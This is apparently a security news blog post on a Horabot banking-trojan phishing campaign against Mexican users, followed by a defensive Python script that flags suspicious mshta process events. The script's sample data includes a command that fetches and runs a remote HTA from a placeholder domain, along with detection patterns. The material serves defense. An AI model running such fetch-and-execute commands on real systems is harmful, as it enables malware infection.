Cyber Web Spider Blog – News

Horabot Trojan Targets Mexico with Phishing Campaign

Posted on March 19, 2026 By CWS

An active cyber campaign involving the notorious Horabot banking trojan is once again targeting users in Mexico. This campaign employs a sophisticated multi-stage infection process combined with an email worm, transforming compromised systems into phishing relays.

Complex Multi-Stage Infection

The Horabot threat package includes a Delphi-written banking trojan paired with a PowerShell-based spreader, making it one of the most intricate financial cyber threats in Latin America. The attack begins with a fake CAPTCHA page that misleads users into executing a harmful command via the Windows Run dialog. The technique exploits no software vulnerability; instead it manipulates users into running a malicious HTA file, which quietly sets off the infection chain.

This approach effectively bypasses many endpoint security measures by turning users into unintentional accomplices in their own compromise. Securelist analysts discovered the operation after detecting an alert for unusual mshta execution within a client’s network. They traced the activity to a deceptive CAPTCHA page and then thoroughly investigated the adversary’s setup.

Widespread Impact and Brazilian Links

During the investigation, researchers uncovered a log on the attacker’s server, revealing 5,384 infected machines, with approximately 93% of them located in Mexico. The records date back to May 2025, indicating a prolonged operation before discovery. There are also distinct connections to Brazil, as evidenced by comments in Brazilian Portuguese within the spreader’s PowerShell code and a Brazilian slang phrase used as an encryption key.

The phishing emails, crafted in Spanish, impersonate invoices or confidential documents to lure Mexican recipients. The Delphi trojan, also known as Casbaneiro and Metamorfo, deceives users with fake banking overlays to capture login credentials during active sessions.

Defensive Measures and Future Outlook

The campaign’s sophistication is highlighted by its elaborate delivery mechanism. Each stage adds a new layer of obfuscation before deploying the final malware. The HTA file retrieves a JavaScript loader from an attacker-controlled domain, and the loader then executes an obfuscated VBScript. This script relies on server-side polymorphism to thwart signature-based detection mechanisms.

To protect against such threats, security teams should block execution of HTA files from untrusted sources and monitor for unusual mshta activity. Implementing YARA rules for both the Horabot Delphi trojan and the AutoIT loader, alongside Suricata rules for detecting the unique C2 traffic pattern, will aid in early detection. All indicators of compromise, such as attacker domains and socket addresses, should be promptly added to network blocklists. User education on recognizing fake CAPTCHA lures and suspicious PDF attachments is vital for defense.
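As an illustration of the mshta monitoring recommended above, the following added example (not taken from the Securelist report or from this article) triages process-creation events for three heuristics. The field names follow Sysmon Event ID 1, while the heuristics, finding labels, and sample events are assumptions constructed for the example.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed sample events; field names follow Sysmon Event ID 1 (process creation).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://lure.example.invalid/check.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"',
     "ParentImage": r"C:\Program Files\Vendor\app.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File stage.ps1",
     "ParentImage": r"C:\Windows\SysWOW64\mshta.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# A URL or UNC path on the command line means the HTA is fetched remotely.
REMOTE_ARG = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

def name(path):
    return basename(path or "").lower()

def mshta_findings(event):
    """Return the reasons this process-creation event looks like HTA abuse."""
    findings = []
    image, parent = name(event.get("Image")), name(event.get("ParentImage"))
    cmdline = event.get("CommandLine", "")
    if image == "mshta.exe":
        if REMOTE_ARG.search(cmdline):
            findings.append("mshta-remote-source")
        # Commands typed into the Run dialog start as children of explorer.exe.
        if parent == "explorer.exe":
            findings.append("mshta-from-user-shell")
    # Later stages: a script interpreter spawned by mshta itself.
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        findings.append("script-host-child-of-mshta")
    return findings

def triage(events):
    """Map event index -> findings, keeping only events that matched."""
    return {i: f for i, ev in enumerate(events) if (f := mshta_findings(ev))}

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], reasons)
```

The second sample event, a vendor application opening a local HTA file, produces no finding, which is the kind of baseline that has to be excluded before alerting on mshta in a real environment.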


Cyber Security News. Tags: AutoIT, banking trojan, C2 Server, Cybersecurity, Delphi Trojan, email worm, fake CAPTCHA, Horabot, Malware, Mexico, Phishing, PowerShell, Securelist
